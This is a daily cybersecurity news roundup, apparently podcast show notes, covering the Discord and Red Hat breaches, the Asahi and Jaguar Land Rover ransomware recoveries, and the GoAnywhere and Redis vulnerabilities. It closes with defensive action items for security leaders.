Good Morning Security Gang!
A jam-packed show filled with global cyber headlines and a quick moment of remembrance on this solemn date — the second anniversary of the October 7th Hamas attacks. I took a few minutes this morning to reflect on that tragedy and the innocent lives lost before diving into today’s cyber updates.
From Discord’s third-party breach and Red Hat’s ongoing extortion saga to Asahi Beer’s ransomware recovery and Jaguar Land Rover’s partial restart, there’s a lot happening in the world of security. So, espresso in hand — let’s get right into it.
💬 Discord Breach via Third-Party Vendor
Discord confirmed that one of its customer support providers was compromised, exposing data for users who interacted with its Trust and Safety or Support teams. The stolen data includes names, emails, IPs, billing details, and even message threads between users and support agents. For those who went through age-verification appeals, government ID images may have been compromised as well. While Discord says no passwords or messages were accessed, this breach underscores the risk of vendor ticketing platforms being targeted. The incident appears unrelated to the broader Salesforce extortion campaign, despite some online speculation.
🧠 Red Hat Extortion by ShinyHunters
Red Hat’s GitLab breach continues to escalate, with threat actors now claiming to have stolen 570GB of data across 28,000 repositories and 800 customer engagement reports. The group calling itself the Crimson Collective, in collaboration with ShinyHunters, has launched an “extortion-as-a-service” operation. They’re threatening to leak the data publicly by October 10th if demands aren’t met. Samples posted include customer engagement reports from major brands. Red Hat maintains the intrusion was limited to consulting systems, but the volume of stolen data suggests a deeper compromise.
🍺 Asahi Beer Ransomware: Data Stolen, Operations Restored
Japan’s Asahi Group Holdings, one of the world’s largest beverage makers, confirmed that last week’s ransomware attack disrupted operations across its Japanese plants but that production has resumed. The company admitted that data was stolen during the breach but credited its business continuity plan for minimizing downtime. By reverting to manual order processing and “pen-and-paper” operations, Asahi was able to keep shipments moving. I praised their quick recovery on the show, noting,
“You can tell when a company has a mature program — they’re back up in a week while others stay down for months.”
🚗 Jaguar Land Rover Begins Recovery
Jaguar Land Rover (JLR) has begun a phased restart of its production facilities, starting with the Wolverhampton engine plant. The ransomware attack that began on September 1st left manufacturing frozen across multiple continents, with suppliers on the brink of insolvency. The UK government’s £1.5B ($2B) loan guarantee ensures suppliers can stay afloat while operations resume. Analysts warn this event could reshape how governments approach industrial cyber risk, treating such incidents as economic security events, not just IT problems.
💾 Medusa Exploits Fortra GoAnywhere
Microsoft confirmed that the Medusa ransomware group has been exploiting a GoAnywhere MFT vulnerability (CVE-2025-10035) for nearly a month. The flaw allows unauthenticated remote code execution. Attackers are abusing legitimate remote management tools like MeshAgent and SimpleHelp for persistence. Patches were released in September, but over 500 vulnerable systems remain exposed online. Microsoft recommends auditing for Rclone and MSTSC.EXE usage and hunting for indicators tied to the Medusa affiliate network.
💻 Redis Patches 13-Year-Old RCE Flaw
Redis fixed a 13-year-old vulnerability (CVE-2025-49844) in its Lua scripting subsystem, allowing authenticated attackers to break out of the sandbox and gain remote code execution. More than 330,000 Redis instances are exposed online, with at least 60,000 unsecured and unauthenticated. If patching isn’t possible immediately, Redis advises disabling Lua and fencing instances behind network segmentation.
📱 Signal Threatens to Leave EU Over Chat Control
As the EU Council prepares to vote on its Chat Control bill, which would mandate client-side scanning of encrypted messages, Signal’s president Meredith Whittaker announced the company will exit the EU market if forced to comply. She warned the law effectively creates “mass surveillance infrastructure” that endangers journalists and governments alike. Germany’s swing vote could determine whether the bill passes or dies.
💰 $4.5M Zero-Day Bounty Competition
Cloud security firm Wiz announced a $4.5 million “ZeroDay.Cloud” bug bounty event, inviting live-stage exploit attempts on AWS, Azure, Google Cloud, NVIDIA toolkits, Kubernetes, and AI frameworks this December in Europe. The largest prize: $300K for hypervisor or AI model breaches. This competition, co-sponsored by major cloud providers, aims to improve transparency around AI and container vulnerabilities — and spark debate over responsible disclosure economics.
🧠 James Azar’s CISO Take
Today’s stories show that cyber resilience is the real differentiator. Asahi’s quick recovery stands in sharp contrast to Jaguar Land Rover’s month-long disruption. The difference isn’t luck — it’s preparation, segmentation, and tested continuity plans. Asahi’s manual fallback saved them millions. Meanwhile, JLR’s dependence on IT-driven automation nearly crippled an entire supply chain. If that’s not a wake-up call to OT-heavy industries, I don’t know what is.
The second theme is trust and containment. Discord’s vendor breach and Red Hat’s extortion case highlight how the weakest link is almost always third-party exposure. Whether it’s a ticketing vendor, a source code repository, or a cloud connector, CISOs must bake third-party visibility and access governance into every process. Threat actors no longer need to breach you directly — they’ll hit your partners, suppliers, or customers to get the same data.
✅ Action Items
💬 Audit third-party vendor access, especially ticketing and support platforms.
🧠 Rotate and revoke stale API keys, especially from OAuth-linked apps.
💾 Patch Fortra GoAnywhere and Redis immediately; monitor for RCE activity.
🍺 Test manual business continuity plans — paper processes still matter.
🚗 Use JLR as a board-level case study for OT/IT risk.
📱 Track the EU’s Chat Control vote — implications go far beyond Europe.
🧑💻 Prepare developer environments for new GitLab and source repo security checks.
💰 Consider participating in bounty programs to stress-test your stack.
And that’s a wrap for today’s show, Security Gang — stay alert, stay resilient, and as always, stay cyber safe! ☕👊
